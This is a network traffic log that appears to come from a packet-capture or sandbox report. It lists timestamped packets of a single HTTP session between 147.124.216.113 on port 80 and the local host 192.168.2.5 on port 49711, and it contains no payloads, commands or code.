Jan 16, 2025 08:25:23.003792048 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003824949 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003876925 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003884077 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003911018 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003938913 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003950119 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003983021 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004017115 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004046917 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004050016 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004079103 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004086971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004120111 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004154921 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004189014 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004199982 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004237890 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004240990 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004276037 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004317999 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004344940 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004353046 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004390001 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004407883 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004445076 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004460096 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004479885 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004514933 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004550934 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004554033 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004585981 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004606009 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004620075 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004653931 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004687071 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004688978 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004723072 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004740000 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004760981 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004793882 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004827023 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004828930 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004870892 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.004879951 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004915953 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004951000 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.004983902 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.005049944 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005084038 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005103111 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.005117893 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005152941 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005188942 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005206108 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.005223036 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005239010 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.005258083 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005294085 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.005326033 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.042458057 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042515993 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042520046 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.042567968 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042637110 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.042661905 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042714119 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042766094 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042798996 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042810917 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.042850018 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042865038 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.042884111 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042917967 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042948008 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.042973042 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.042999983 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043024063 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043040991 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043092966 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043107986 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043128967 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043175936 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043178082 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043212891 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043251991 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043308020 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043318033 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043358088 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043368101 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043392897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043431044 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043468952 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043468952 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043504000 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043536901 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043540955 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043576002 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043607950 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043627977 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043673038 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043678045 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043745041 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043780088 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043812037 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043831110 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043865919 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043894053 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.043900967 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043951988 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.043989897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044013023 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044039965 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044040918 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044076920 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044110060 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044143915 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044169903 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044178963 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044214010 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044214964 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044248104 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044264078 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044282913 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044317007 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044353962 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044378042 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044416904 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044482946 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044517994 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044553041 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044578075 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044586897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044621944 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044650078 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044656992 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044691086 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044723034 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044724941 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044787884 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044816971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044852018 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044887066 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044923067 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.044950962 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.044990063 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090352058 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090389013 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090425014 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090461969 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090475082 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090512991 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090528965 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090562105 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090596914 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090615034 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090631008 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090683937 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090718031 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090729952 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090753078 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090766907 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090805054 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090850115 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090857029 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090890884 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090925932 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.090959072 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.090975046 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091012955 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091052055 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091058016 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091087103 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091103077 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091120958 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091155052 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091176033 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091224909 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091278076 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091280937 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091327906 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091367006 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091417074 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091424942 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091453075 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091470957 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091486931 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091526985 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091561079 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091589928 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091600895 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091614962 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091636896 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091671944 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091706038 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091728926 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091741085 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091764927 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091825962 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091861010 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091876984 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.091893911 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091929913 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.091984987 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092024088 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092062950 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092078924 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092099905 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092133999 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092160940 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092185974 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092243910 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092335939 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092370033 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092405081 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092431068 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092439890 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092473984 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092503071 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092509031 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092545033 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092573881 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092581987 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092648983 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092649937 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092704058 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092763901 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.092768908 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092803001 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092838049 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.092854977 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130002975 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130065918 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130163908 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130233049 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130294085 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130317926 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130352020 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130394936 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130405903 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130428076 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130464077 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130495071 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130517960 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130546093 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130582094 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130599022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130633116 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130649090 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130669117 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130721092 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130738020 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130755901 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130789042 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130824089 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130845070 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130875111 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130887985 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.130913019 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130945921 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130980015 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.130990028 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131012917 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131052971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131061077 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131087065 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131104946 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131124973 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131175041 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131208897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131234884 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131242037 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131273985 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131277084 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131352901 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131378889 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131405115 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131438971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131475925 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131500959 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131511927 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131537914 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131546974 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131582022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131617069 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131644964 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131653070 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131685972 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131688118 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131719112 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131742954 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131752968 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131788969 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131824017 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131854057 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131855965 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131880999 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.131890059 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131926060 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.131958961 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.132103920 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132138014 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132170916 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132200956 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.132205009 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132240057 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132240057 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.132273912 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132304907 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.132308006 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132359028 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.132359982 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132395983 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132428885 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132463932 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.132466078 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.132554054 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.177947998 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.177983046 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178035975 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178067923 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.178071022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178106070 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178132057 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.178160906 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178196907 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178224087 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.178241014 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178275108 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178324938 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178352118 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.178360939 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178392887 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.178395987 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178447962 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178452015 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.178499937 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178541899 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.178554058 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.178606987 CET	80	49711	147.124.216.113	192.168.2.5
